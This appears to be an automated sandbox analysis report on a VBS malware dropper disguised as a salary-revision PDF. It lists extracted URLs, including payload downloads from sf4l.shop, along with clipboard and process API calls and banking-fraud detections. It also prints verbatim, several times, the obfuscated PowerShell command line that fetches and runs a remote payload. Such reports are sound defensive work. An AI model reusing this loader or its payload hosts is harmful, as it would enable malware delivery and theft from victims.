Source: bhv528A.tmp.11.dr	String found in binary or memory: https://fp-as.azureedge.net/apc/trans.gif?7bac4e73e9b20fcc41dc97447167937d
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1487804584.000001C4E55FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: msiexec.exe, 0000000B.00000002.1811966044.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfh
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: msiexec.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: powershell.exe, 00000002.00000002.1523751106.000001C4F4AC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-07-50-22/PreSignInSettingsConfig.json
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=d75433bcf1f9312f1975
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=ad62f4
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: powershell.exe, 00000002.00000002.1487804584.000001C4E4C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1487804584.000001C4E640C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sf4l.shop
Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sf4l.shop/
Source: powershell.exe, 00000002.00000002.1487804584.000001C4E4C76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sf4l.shop/zWAbmrmP/Diwani.pfbP
Source: powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sf4l.shop/zWAbmrmP/Diwani.pfbXR
Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FAA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2646463919.0000000020060000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sf4l.shop/znUvwLfo/XAManxzmrlwVYAnDZ78.bin
Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sf4l.shop/znUvwLfo/XAManxzmrlwVYAnDZ78.binzw
Source: msiexec.exe, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv528A.tmp.11.dr	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49930 version: TLS 1.2

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_0041183A OpenClipboard,GetLastError,

11_2_0041183A

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	11_2_0040987A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	11_2_004098E2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	12_2_00406DFC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	12_2_00406E9F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	13_2_004068B5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	13_2_004072B5

E-Banking Fraud

Potential malicious VBS script found (suspicious strings)

Source: Yara match	File source: 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1853013269.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1789395704.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1794834072.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2634385047.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1779780238.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 8140, type: MEMORYSTR

System Summary

Source:

Initial file: Call Drivhjulenes.ShellExecute(elektrolytterne, Chr(34) & Essayistisk & Chr(34), "", "", Hjlpeprogrammernes)

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	11_2_0040DD85
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_00401806 NtdllDefWindowProc_W,	11_2_00401806
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_004018C0 NtdllDefWindowProc_W,	11_2_004018C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_004016FD NtdllDefWindowProc_A,	12_2_004016FD
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_004017B7 NtdllDefWindowProc_A,	12_2_004017B7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_00402CAC NtdllDefWindowProc_A,	13_2_00402CAC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_00402D66 NtdllDefWindowProc_A,	13_2_00402D66

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFAAB79BEA2	2_2_00007FFAAB79BEA2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFAAB79B0F6	2_2_00007FFAAB79B0F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFAAB86926A	2_2_00007FFAAB86926A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFAAB86AB4A	2_2_00007FFAAB86AB4A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04C2EDF0	4_2_04C2EDF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04C2F6C0	4_2_04C2F6C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04C2EAA8	4_2_04C2EAA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_20917194	7_2_20917194
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2090B5C1	7_2_2090B5C1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0044B040	11_2_0044B040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0043610D	11_2_0043610D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_00447310	11_2_00447310
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0044A490	11_2_0044A490
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0040755A	11_2_0040755A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0043C560	11_2_0043C560
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0044B610	11_2_0044B610
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0044D6C0	11_2_0044D6C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_004476F0	11_2_004476F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0044B870	11_2_0044B870
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0044081D	11_2_0044081D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_00414957	11_2_00414957
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_004079EE	11_2_004079EE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_00407AEB	11_2_00407AEB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0044AA80	11_2_0044AA80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_00412AA9	11_2_00412AA9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_00404B74	11_2_00404B74
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_00404B03	11_2_00404B03
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0044BBD8	11_2_0044BBD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_00404BE5	11_2_00404BE5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_00404C76	11_2_00404C76
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_00415CFE	11_2_00415CFE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_00416D72	11_2_00416D72
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_00446D30	11_2_00446D30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_00446D8B	11_2_00446D8B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_00406E8F	11_2_00406E8F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00405038	12_2_00405038
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_0041208C	12_2_0041208C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_004050A9	12_2_004050A9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_0040511A	12_2_0040511A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_0043C13A	12_2_0043C13A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_004051AB	12_2_004051AB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00449300	12_2_00449300
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_0040D322	12_2_0040D322
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_0044A4F0	12_2_0044A4F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_0043A5AB	12_2_0043A5AB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00413631	12_2_00413631
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00446690	12_2_00446690
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_0044A730	12_2_0044A730
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_004398D8	12_2_004398D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_004498E0	12_2_004498E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_0044A886	12_2_0044A886
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_0043DA09	12_2_0043DA09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00438D5E	12_2_00438D5E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00449ED0	12_2_00449ED0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_0041FE83	12_2_0041FE83
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00430F54	12_2_00430F54
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_004050C2	13_2_004050C2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_004014AB	13_2_004014AB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_00405133	13_2_00405133
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_004051A4	13_2_004051A4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_00401246	13_2_00401246
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_0040CA46	13_2_0040CA46
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_00405235	13_2_00405235
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_004032C8	13_2_004032C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_00401689	13_2_00401689
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_00402F60	13_2_00402F60

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 00413025 appears 79 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 00416760 appears 69 times

Source: Salary Revision_pdf.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5336
Source: unknown	Process created: Commandline size = 5336
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5336	Jump to behavior

Source: wscript.exe, 00000000.00000003.1350102325.0000023D996B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: delsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U 